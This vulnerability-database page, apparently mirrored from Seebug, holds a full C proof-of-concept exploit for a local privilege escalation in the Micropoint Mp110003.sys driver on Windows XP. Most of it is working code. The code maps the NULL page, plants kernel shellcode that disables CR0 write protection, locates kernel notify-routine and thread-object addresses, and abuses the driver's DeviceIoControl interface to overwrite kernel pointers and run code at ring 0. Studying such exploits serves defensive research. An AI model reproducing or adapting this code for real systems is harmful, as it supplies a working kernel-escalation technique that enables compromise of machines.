Lucene search
K

Micropoint Mp110003.sys <= 1.3.10123.0 Local Privilege Escalation Vulnerability

🗓️ 13 Apr 2010 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 267 Views

Micropoint Mp110003.sys Local Privilege Escalation Vulnerabilit

Code

                                                
#include "stdafx.h"
#include "windows.h"
#include "shlwapi.h"
#pragma  comment(lib , "shlwapi.lib")

VOID __declspec(naked) ShellCode()
{
	__asm
	{
		pushad
		mov eax , cr0 
		push eax
		and eax, 0xFFFEFFFF
		mov cr0 , eax
		cli 
		mov eax , 0xAAAA5555
		mov dword ptr[eax] , 0x33343536
		sti
		pop eax
		mov cr0 , eax
		popad
		ret 0x4
	}
}
VOID __declspec(naked) nopfunc()
{
	__asm{mov edi ,edi
		nop };
}
enum { SystemModuleInformation = 11,
		SystemHandleInformation = 16 };
typedef struct {
    ULONG   Unknown1;
    ULONG   Unknown2;
    PVOID   Base;
    ULONG   Size;
    ULONG   Flags;
    USHORT  Index;
    USHORT  NameLength;
    USHORT  LoadCount;
    USHORT  PathLength;
    CHAR    ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct {
    ULONG   Count;
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
PVOID GetInfoTable(ULONG ATableType)
{
	ULONG mSize = 0x4000;
	PVOID mPtr = NULL;
	LONG status;
	HMODULE hlib = GetModuleHandle("ntdll.dll");
	PVOID pZwQuerySystemInformation = GetProcAddress(hlib , "ZwQuerySystemInformation");
	do
	{
		mPtr = malloc(mSize);
		if (mPtr)
		{
			__asm
			{
				push 0
				push mSize
				push mPtr
				push ATableType
				call pZwQuerySystemInformation
				mov  status , eax
			}
			
		}
		else
		{
			return NULL;
		}
		if (status == 0xc0000004)
		{
			free(mPtr);
			mSize = mSize * 2;
		}
	} while (status == 0xc0000004);
	
	if (status == 0)
	{
		return mPtr;
	}
	
	free(mPtr);
	return NULL;
}
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
    USHORT UniqueProcessId;
    USHORT CreatorBackTraceIndex;
    UCHAR ObjectTypeIndex;
    UCHAR HandleAttributes;
    USHORT HandleValue;
    PVOID Object;
    ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;

typedef struct _SYSTEM_HANDLE_INFORMATION {
    ULONG NumberOfHandles;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO Information[ 1 ];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

DWORD WINAPI LegoThread(LPVOID lpThreadParameter)
{
	while(TRUE)
	{
		Sleep(0x1000);

	}
	return 0 ; 
}
int main(int argc, char* argv[])
{
	DWORD dwVersion = 0;
	DWORD dwMajorVersion = 0;
	DWORD dwMinorVersion = 0; 
	
	
    dwVersion = GetVersion();
	
    // Get the Windows version.
	
    dwMajorVersion = (DWORD)(LOBYTE(LOWORD(dwVersion)));
    dwMinorVersion = (DWORD)(HIBYTE(LOWORD(dwVersion)));

	if (dwMajorVersion != 5 || dwMinorVersion != 1)
	{
		printf("POC for XP only\n");
		getchar();
		return 0 ; 
	}

	printf("Micropoint Mp110003.sys <= 1.3.10123.0 Local Privilege Escalation Vulnerability POC\n"
		"by MJ0011 [email protected]\n"
		"Press Enter\n");

	getchar();
    
	HANDLE hDev = CreateFile("\\\\.\\mp110013" , 
		0 ,
		FILE_SHARE_READ | FILE_SHARE_WRITE , 
		0,
		OPEN_EXISTING,0,
		0
		);

	if (hDev == INVALID_HANDLE_VALUE)
	{
		printf("cannot open device %u\n" , GetLastError());
		return 0 ; 
	}


    PVOID BaseAddress             = (PVOID) 1;
    ULONG RegionSize              = (ULONG) 0;
	PVOID pNtAllocateVirtualMemory = GetProcAddress(GetModuleHandle("ntdll.dll") , "NtAllocateVirtualMemory");
	PVOID pNtFreeVirtualMemory = GetProcAddress(GetModuleHandle("ntdll.dll") , "NtFreeVirtualMemory");

	ULONG status ; 
	
    __asm
	{
		push 0x8000
		lea eax , RegionSize
		push eax
		lea eax , BaseAddress
		push eax
		push 0xffffffff
		call pNtFreeVirtualMemory
		mov  RegionSize,0x1000
		push 0x40
		push 0x3000
		lea eax , RegionSize
		push eax
		push 0 
		lea eax , BaseAddress
		push eax
		push 0xffffffff
		call pNtAllocateVirtualMemory
		mov status , eax
	}

	if (status != 0 )
	{
		printf("allocate 0 memory failed %08x\n" , status);
		return 0 ; 
	}
	//set nop code
	ULONG codesize = (ULONG)nopfunc - (ULONG)ShellCode;

	memset((PVOID)0 , 0x90 , 0x8);
	memcpy((PVOID)0x8 , ShellCode , codesize);
	ULONG i ; 
	for (i = 0x8 ; i < codesize+0x8 ; i++)
	{
		if (*(DWORD*)i == 0xAAAA5555)
		{
			*(DWORD*)i = (DWORD)(GetModuleHandle("ntdll.dll") + 0x2);
			break ; 
		}
	}
	
	PSYSTEM_MODULE_INFORMATION pModInfo = (PSYSTEM_MODULE_INFORMATION)GetInfoTable(SystemModuleInformation);

	if (pModInfo == 0 )
	{
		printf("get info table failed!\n");
		return 0 ; 
	}

	ULONG Tid ; 

	HANDLE hThread = CreateThread(0 , 0 , LegoThread , 0 , 0 , &Tid);
	if (hThread == 0 )
	{
		printf("cannot open thread %u\n",GetLastError());
		return 0 ; 
	}
	//SystemHandleInformation=16
	PSYSTEM_HANDLE_INFORMATION pHandleInfo = (PSYSTEM_HANDLE_INFORMATION)GetInfoTable(16);
	if (pHandleInfo == 0 )
	{
		printf("cannot get handle info\n");
		return 0 ; 
	}	
	ULONG ThreadObject =0; 

	for (i = 0 ; i < pHandleInfo->NumberOfHandles ; i ++)
	{
		if (pHandleInfo->Information[i].UniqueProcessId == GetCurrentProcessId() &&
			pHandleInfo->Information[i].HandleValue == (USHORT)hThread)
		{
			ThreadObject = (ULONG)pHandleInfo->Information[i].Object;
			break ; 
		}
	}
	if (ThreadObject == 0 )
	{
		printf("cannot get thread object!\n");
		return 0 ; 
	}
	ThreadObject+=0xd0;


	
	HMODULE hkernel = LoadLibraryA(strrchr(pModInfo->Module[0].ImageName, '\\') + 1);
	if (hkernel == 0 )
	{
		printf("kernel mapping error %u\n" , GetLastError());
		return 0 ; 
	}

	ULONG PsSetLegoNotifyRoutine = (ULONG)GetProcAddress(hkernel , "PsSetLegoNotifyRoutine");
	ULONG PspLegoNotifyRoutine = 0 ;

	if (PsSetLegoNotifyRoutine ==0)
	{
		printf("PsSetLegoNotifyRoutine==0");
		return 0 ; 
	}

	for (i = PsSetLegoNotifyRoutine ; i < PsSetLegoNotifyRoutine + 0x10 ; i ++)
	{
		if (*(BYTE*)i == 0xa3 && *(BYTE*)(i + 5 == 0xb8 ) && *(DWORD*)(i + 6 )==0xd0)
		{
			PspLegoNotifyRoutine = *(ULONG*)(i +1); 
			break ; 
		}
	}

	if (PspLegoNotifyRoutine == 0 )
	{
		printf("bad PsSetLegoNotifyRoutine\n");
		return 0 ;
	}


	PIMAGE_DOS_HEADER doshdr ; 
	PIMAGE_NT_HEADERS nthdr ; 
	doshdr = (PIMAGE_DOS_HEADER )(hkernel);
	nthdr = (PIMAGE_NT_HEADERS)((ULONG)hkernel + doshdr->e_lfanew);

	PspLegoNotifyRoutine += (ULONG)pModInfo->Module[0].Base - nthdr->OptionalHeader.ImageBase;
	FreeLibrary(hkernel);
	ULONG PspLegoNotifyRoutineOff = (ULONG)PspLegoNotifyRoutine - (ULONG)pModInfo->Module[0].Base ; 

	ULONG btr ; 
	ULONG InputBuffer[3] = {0x0 , 0x8a4e0 , PspLegoNotifyRoutineOff };

	if (!DeviceIoControl(hDev , 
		0x800001A4, 
		&InputBuffer , 
		sizeof(ULONG)*3 , 
		NULL, 
		0,
		&btr , 
		0))
	{
		printf("device io control failed %u\n", GetLastError());
		return 0 ; 
	}
	
	PVOID pNtCreateProcessEx = GetProcAddress(GetModuleHandle("ntdll.dll") , "NtCreateProcessEx");
	HANDLE hProc ; 

	__asm
	{
		push 0 
		push 0
		push 0
		push 0 
		push 0 
		push 0x1 
		push 0 
		push 0 
		lea eax ,hProc
		push eax
		call pNtCreateProcessEx
	}
	ULONG ThreadLegoDataOff = ThreadObject - (ULONG)pModInfo->Module[0].Base ;

	InputBuffer[2] = ThreadLegoDataOff;
	if (!DeviceIoControl(hDev , 
		0x800001A4, 
		&InputBuffer , 
		sizeof(ULONG)*3 , 
		NULL, 
		0,
		&btr , 
		0))
	{
		printf("device io control failed %u\n", GetLastError());
		return 0 ; 
	}
	
	
	__asm
	{
		push 0 
			push 0
			push 0
			push 0 
			push 0 
			push 0x1 
			push 0 
			push 0 
			lea eax ,hProc
			push eax
			call pNtCreateProcessEx
	}
	//TARGET 0DAY

	
	TerminateThread(hThread , 0 );

	printf("POC Executed\n");
	getchar();
	return 0;
}

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Apr 2010 00:00Current
7.1High risk
Vulners AI Score7.1
267